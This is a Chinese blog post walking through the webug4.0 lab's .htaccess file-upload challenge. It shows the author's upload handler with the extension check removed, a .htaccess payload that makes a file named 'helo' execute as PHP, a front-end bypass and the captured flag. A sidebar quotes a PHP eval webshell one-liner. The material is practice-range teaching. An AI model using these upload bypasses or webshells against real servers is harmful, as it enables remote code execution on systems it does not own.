webug4.0-文件上传(htaccess)

最新推荐文章于 2024-03-28 22:05:33 发布
最新推荐文章于 2024-03-28 22:05:33 发布
阅读量787 收藏 1
点赞数 1
分类专栏: 靶场练习
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/nex1less/article/details/100009470
版权

0x01 相关知识

 1.什么是htaccess?

.htaccess文件(或者"分布式配置文件"),全称是Hypertext Access(超文本入口)。提供了针对目录改变配置的方法, 即,在一个特定的文档目录中放置一个包含一个或多个指令的文件, 以作用于此目录及其所有子目录。作为用户,所能使用的命令受到限制。管理员可以通过Apache的AllowOverride指令来设置。

2.htaccess的功能有哪些?

通过htaccess文件,可以帮我们实现:网页301重定向、自定义404错误页面、改变文件扩展名、允许/阻止特定的用户或者目录的访问、禁止目录列表、配置默认文档等功能。

0x02 漏洞利用


1.关于这个题,我忍不住爆粗口了,他妈的,连个正常图片都上传不了,你跟我玩nm呢。。

2.只能修改源代码,把之前的复制过来一份:

<?php

require_once "../../common/common.php";
if (!isset($_SESSION['user'])) {
    header("Location:../login.php");
}
$filter = array(".jpg", '.png', '.gif');

if ($_FILES['file']['error']) {
    die();
}
if ($_FILES['file']) {
    $arr = $_FILES['file'];
    $file_ext = trim(strtolower(strrchr($arr['name'], ".")));


    if (file_exists(TPMELATE."/upload/".$arr['name'])){
        echo "<script>alert('该文件已经存在')</script>";
    } else{
        $filename = iconv("UTF-8","gb2312",TPMELATE."/upload/".$arr['name']);
        move_uploaded_file($arr["tmp_name"],$filename);
        echo $filename;die();
    }
}
require_once TPMELATE."/upload_file_1.html";
wAAACH5BAEKAAAALAAAAAABAAEAAAICRAEAOw==

3.ok正式开始,上面已经介绍了.htaccess是一个针对目录改变配置的方法,所以我们使用.htaccess改变配置,让他将我们的文件解析成php

4.把php版本改为5.2.17的

5.新建文件名字为:.htaccess 文件内容为:

# FileMatch 参数即为文件名的正则匹配
<FilesMatch "helo">
  SetHandler application/x-httpd-php
</FilesMatch>
wAAACH5BAEKAAAALAAAAAABAAEAAAICRAEAOw==

6. 上传文件:(老方法 f12修改前端代码 绕过一下)

wAAACH5BAEKAAAALAAAAAABAAEAAAICRAEAOw==

7.上传helo文件:

wAAACH5BAEKAAAALAAAAAABAAEAAAICRAEAOw==

8. 访问helo:

http://192.168.72.136/template/upload/helo
wAAACH5BAEKAAAALAAAAAABAAEAAAICRAEAOw==

9.成功:

10.寻找flag:

11.找到flag并复制粘粘:vbchjgwestruyi

0x03 结语

                                                                                   这个题不改源代码的话非常难

nex1less
关注
  • 1
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
yii2-basic-htaccess:yii2 basic的文件htaccess
05-14
此方法自动创建.htaccess文件并清除自身。 下载文件或作曲家需要ilopx / yii2-basic-htaccess 放入根yii2应用程序 启动http:// {your_yii2_webapp} 遵循 b。 手动设定 1.步骤 创建文件{root} /。htaccess: ...
webug4.0靶场之文件上传
0nc3的博客
06-26 847
0x00文件上传靶场 webug4.0的文件上传靶场包括以下关卡 前端JS绕过 解析上传(上传失败) 畸形文件 截断上传(上传失败) htaccess 0x01 前端JS绕过 上传前将php文件后缀改为jpg绕过前端后缀名判断 抓包修改为.php即可 从响应包中得到存储路径,访问读取phpinfo。 0x02 解析漏洞 0x03 畸形文件 绕过前端验证后改为php后缀时,发现php字符被过...
webug--上传篇
gclome的博客
05-31 294
拿到这个题目,找到上传点,先上传一张普通的图片,暴露出了上传地址 访问下面这个链接,就可以看到这张图片 接下来写个一句话木马试一试,文件名为bypass.php <?php @eval($_POST['pass']);?> 直接上传,不允许此格式 不妨将bypass.php改为bypass.png , 先绕过前端检测 然后用bp抓包,再修改为php文件 接下来用蚁剑连接试试看,连接成功 ...
webug 4.0 第二十一关 文件上传(htaccess)
ONS_cukuyo的博客
06-02 786
这一关代码有错且没有提示,而且说的是htaccess上传但是又在上传的黑名单里加上了htaccess,这真是让人想吐槽得很啊。所以我就直接拿了前面的上传代码然后去掉了后缀名验证,大家可以参照着我改法改一改,文件地址在C:\phpStudy\WWW\control\upload_file\upload_file_5.php <?php require_once "../../common/c...
webug笔记——上传漏洞
gbxiaowang的博客
06-04 278
一、文件上传(前端拦截) 先审查一下元素: 这里大概只能上传图片格式。 先写个一句话 …这里的post要大写。。但是不想再截过图了 将其修改为可以上传的jpg格式 上传成功后可以看到路径, 用burpsuite拦包,将后缀又改为php,可以绕过过滤上传。 蚁剑连接: 能连接上去就成功了 二、文件上传(解析漏洞) 思路:利用生僻字:1.php龘.jpg这种形式上传, 靶场原因无法完成。 三、文件上传(畸形文件) 思路:双写php:1.pphphp这种形式上传成功 四、文件上传(截断上传) 思路:利用
文件上传 .htaccess 与.user.ini
devil8123665的博客
03-13 2291
htaccess uesr.ini
Web安全之文件上传漏洞详解
hack0919的博客
04-18 3380
文件上传”本身没有问题,有问题的是文件上传后,服务器怎么处理、解释文件。如果服务器的处理逻辑做的不够安全,则会导致严重的后果
WEB入门——文件上传漏洞
HasntStartIsOver的博客
06-04 3956
文件上传漏洞服务端代码未对客户端上传的文件进行严格的验证,导致漏洞。如果.php后缀被限制,可以尝试:.php3、php4、.PHp(修改大小写)、.phtml、.pht等后缀,WebShell的内容一样。这两个配置的意思就是:我们指定一个文件,那么该文件就会被包含在要执行的php文件中(如index.php)。如果客户端JS脚本有加限制(例如上传图片,JS脚本显示了只能上传图片格式,不能上传.php后缀的文件)。1、上传的文件是web脚本语言,服务器的web容器解释并执行了用户上传的脚本,脚本语言执行。
文件上传漏洞笔记
weixin_42695055的博客
01-09 774
由于程序员在对用户文件上传功能实现代码没有严格限制用户上传的文件后缀以及文件类型或者处理缺陷,而导致的用户可以越过其本身权限向服务器上上传可执行的动态脚本文件。
1-Web安全——文件上传漏洞
网络安全
08-20 4100
1. 上传文件漏洞原理 现在大部分web应用程序都有上传文件的功能,例如个人博客上传各种文件和图片,招聘网站上传doc文件格式的简历等等。只要web应用程序有上传文件的功能,就可能会存在上传文件漏洞。 为什么会有上传文件漏洞? 一般用户在上传文件时,如果web应用程序的代码没有对上传的文件进行严格的校验和过滤时,容易出现允许上传任意文件的情况,然后恶意攻击者利用这一点上传恶意脚本文件(aspx,php,jsp等文件)到服务器,从而获取网站的管理员权限,对服务器造成巨大威胁,这个恶意文件则被称为webs
文件上传(入门)学习(续)
最新发布
Z11762的博客
03-28 948
了解了基本原理之后,需要分析它怎么起作用,如果按照上述的做法来做,则00绕过只能绕过前端验证,因为如果是后端验证,那么即使后缀被截断了,处理之后为.php,还是会被后端验证拦截,所以不是什么情况下00截断都有用的,但是可以确定,在绕过前端验证可以用。(2)该文件还会匹配文件名中的关键字,如:[1.php.jpg]中包含.php,并且.htaccess文件的内容如下,[1.php.jpg]中的代码就会被执行。(3)匹配文件名,当.htaccess文件内容如下,它可以将匹配到的文件名的文件中的代码执行。
assemble-middleware-htaccess
06-06
组装-中间件-htaccess 用于组装的 .htaccess 中间件入门要安装模块,请在命令行中运行以下命令: npm i assemble-middleware-htaccess --save 在您的应用程序中使用以下 JavaScript 行: var middleware_htaccess = ...
fix-drupal-htaccess-rewritebase:修复适合我的设置的.htaccess文件
05-11
fix-drupal-htaccess-rewritebase 修复适合我的设置的.htaccess文件安装npm i -g fix-drupal-htaccess-rewritebase 用法$ fix-drupal-htaccess-rewritebase 它有什么作用? 通常这是: diff --git a/drupal/....
Evolution-custom-htaccess:MODx Evolution 自定义 htaccess 文件以提供更好的保护
07-14
MODx Evolution 自定义 htaccess 文件以提供更好的保护 它能做什么 发送 403 (FORBIDDEN) 以响应恶意脚本和恶意机器人 感谢mrhaw: : 安装 提取并上传到 MODx Evolution 的根目录 将两个 ht.access 文件(一个在...
PHP实例开发源码-htaccess Editor htaccess在线生成器收藏版.zip
10-15
PHP实例开发源码—htaccess Editor htaccess在线生成器收藏版.zip PHP实例开发源码—htaccess Editor htaccess在线生成器收藏版.zip PHP实例开发源码—htaccess Editor htaccess在线生成器收藏版.zip
webug4.0靶场搭建
nex1less的博客
08-22 2481
0x01 webug4.0镜像下载 1.webug官网:www.webug.org 2.开发环境:php+mysql+apache 3.百度云盘链接:https://pan.baidu.com/s/1fVTQY2wuNCRTQu5-BnelEA 提取码:lmzc 0x02 webug4.0在VMware上安装 1.下载完的文件:截图 2.VMware打开:配置不用改 截图...
webug4.0-布尔注入
nex1less的博客
08-25 1792
布尔注入介绍:对于基于布尔的盲注,可通过构造真or假判断条件(数据库各项信息取值的大小比较,如:字段长度、版本数值、字段名、字段名各组成部分在不同位置对应的字符ASCII码...),将构造的sql语句提交到服务器,然后根据服务器对不同的请求返回不同的页面结果(True、False);然后不断调整判断条件中的数值以逼近真实值,特别是需要关注响应从True<-->False发生变化的转折...
webug4.0-xxe注入
nex1less的博客
08-28 1487
0x01 xxe基本知识 1.什么是xxe漏洞? xxe就是XML External Entity,也就是XML外部实体注入攻击。 2.xxe漏洞的危害大吗? 大,恶意用户通过构造恶意内容,就可能导致任意文件读取、系统命令执行、内网端口探测、攻击内网网站等危害。 3.xxe漏洞产生原因是什么? 允许引用外部实体时,如php中libxml_disable_entity_loader当...
webug4.0-万能密码登陆
nex1less的博客
09-01 1474
0x01 相关知识 1.万能密码原理: $sql = "SELECT * FROM user WHERE username = '{$username}' AND password = '{$password}'"; $res = $dbConnect->query($sql); 以上就是典型的sql语句,输入 ' or 1=1 # 之后sql语句就变...
ctf技能树文件上传.htaccess
04-30
文件上传漏洞通常是指在网站中存在对用户上传文件的功能,但是没有对上传文件的类型、大小、数量、路径等进行严格限制或过滤,从而导致攻击者可以通过上传包含恶意代码的文件来实现攻击的目的。而.htaccess是一个常用于Apache服务器的配置文件,可以用来设置网站的访问权限、页面重定向、防止目录遍历等功能。 因此,攻击者可以通过上传一个包含了.htaccess文件的恶意文件来实现对服务器的攻击。比如,攻击者可以在.htaccess文件中添加一些重定向规则,将用户的访问请求重定向到攻击者控制的恶意网站上,从而实现诱导用户下载恶意软件或者窃取用户敏感信息等攻击。 防范措施: 1. 限制上传文件的类型、大小、数量等,可以通过后台代码或第三方插件实现; 2. 对上传文件进行严格过滤和检查,确保不包含任何可执行的恶意代码; 3. 对服务器上的.htaccess文件进行定期检查和清理,确保其中不包含任何不安全的设置; 4. 定期升级服务器操作系统、Web服务器和相关应用程序的补丁,确保服务器的安全性。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值